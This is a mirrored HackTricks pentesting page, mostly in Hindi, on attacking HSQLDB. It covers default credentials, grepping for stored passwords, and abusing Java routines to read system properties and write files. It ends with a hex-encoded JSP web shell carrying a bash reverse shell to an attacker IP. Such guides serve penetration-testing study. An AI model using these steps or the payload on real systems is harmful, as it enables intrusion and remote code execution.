maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/9001-pentesting-hsqldb.md

70 lines
6.0 KiB
Markdown
Raw Blame History

# 9001 - Pentesting HSQLDB
{{#include ../banners/hacktricks-training.md}}
## Basic Information
**HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\)** एक प्रमुख SQL रिलेशनल डेटाबेस सिस्टम है जो Java में लिखा गया है। यह एक छोटा, तेज़ मल्टीथ्रेडेड और ट्रांजैक्शनल डेटाबेस इंजन प्रदान करता है जिसमें इन-मेमोरी और डिस्क-आधारित टेबल होते हैं और यह एम्बेडेड और सर्वर मोड का समर्थन करता है।
**डिफ़ॉल्ट पोर्ट:** 9001
```text
9001/tcp open jdbc HSQLDB JDBC (Network Compatibility Version 2.3.4.0)
```
## Default Settings
ध्यान दें कि डिफ़ॉल्ट रूप से यह सेवा संभवतः मेमोरी में चल रही है या लोकलहोस्ट से बंधी हुई है। यदि आपने इसे पाया है, तो आपने संभवतः किसी अन्य सेवा का शोषण किया है और विशेषाधिकार बढ़ाने की कोशिश कर रहे हैं।
डिफ़ॉल्ट क्रेडेंशियल आमतौर पर `sa` होते हैं जिनका पासवर्ड खाली होता है।
यदि आपने किसी अन्य सेवा का शोषण किया है, तो संभावित क्रेडेंशियल्स के लिए खोजें।
```text
grep -rP 'jdbc:hsqldb.*password.*' /path/to/search
```
ध्यान दें कि डेटाबेस का नाम ध्यान से नोट करें - आपको कनेक्ट करने के लिए इसकी आवश्यकता होगी।
## जानकारी इकट्ठा करना
DB इंस्टेंस से कनेक्ट करें [HSQLDB डाउनलोड करके](https://sourceforge.net/projects/hsqldb/files/) और `hsqldb/lib/hsqldb.jar` को निकालें। GUI ऐप \(eww\) को `java -jar hsqldb.jar` का उपयोग करके चलाएं और खोजे गए/कमजोर क्रेडेंशियल्स का उपयोग करके इंस्टेंस से कनेक्ट करें।
ध्यान दें कि कनेक्शन URL एक दूरस्थ सिस्टम के लिए इस तरह दिखेगा: `jdbc:hsqldb:hsql://ip/DBNAME`
## तरकीबें
### जावा भाषा रूटीन
हम HSQLDB से जावा भाषा रूटीन का उपयोग करके एक जावा क्लास के स्थिर तरीकों को कॉल कर सकते हैं। ध्यान दें कि कॉल की गई क्लास को एप्लिकेशन के क्लासपाथ में होना चाहिए।
JRTs `functions` या `procedures` हो सकते हैं। यदि जावा विधि एक या अधिक SQL-संगत प्राइमिटिव वेरिएबल लौटाती है, तो फ़ंक्शंस को SQL स्टेटमेंट के माध्यम से कॉल किया जा सकता है। इन्हें `VALUES` स्टेटमेंट का उपयोग करके लागू किया जाता है।
यदि जावा विधि जिसे हम कॉल करना चाहते हैं, void लौटाती है, तो हमें `CALL` स्टेटमेंट के साथ लागू की गई एक प्रक्रिया का उपयोग करना होगा।
### जावा सिस्टम प्रॉपर्टीज़ पढ़ना
फंक्शन बनाएं:
```text
CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
DETERMINISTIC NO SQL
EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'
```
कार्यवाही फ़ंक्शन:
```text
VALUES(getsystemproperty('user.name'))
```
आप [यहाँ सिस्टम प्रॉपर्टीज़ की सूची](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html) पा सकते हैं।
### फ़ाइल में सामग्री लिखें
आप `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` Java गैजेट का उपयोग कर सकते हैं जो JDK में स्थित है \(जो एप्लिकेशन के क्लास पाथ में ऑटो लोड होता है\) कस्टम प्रक्रिया के माध्यम से डिस्क पर हेक्स-कोडेड आइटम लिखने के लिए। **1024 बाइट्स का अधिकतम आकार ध्यान में रखें**
प्रक्रिया बनाएं:
```text
CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'
```
प्रक्रिया निष्पादित करें:
```text
call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024)))
```
{{#include ../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink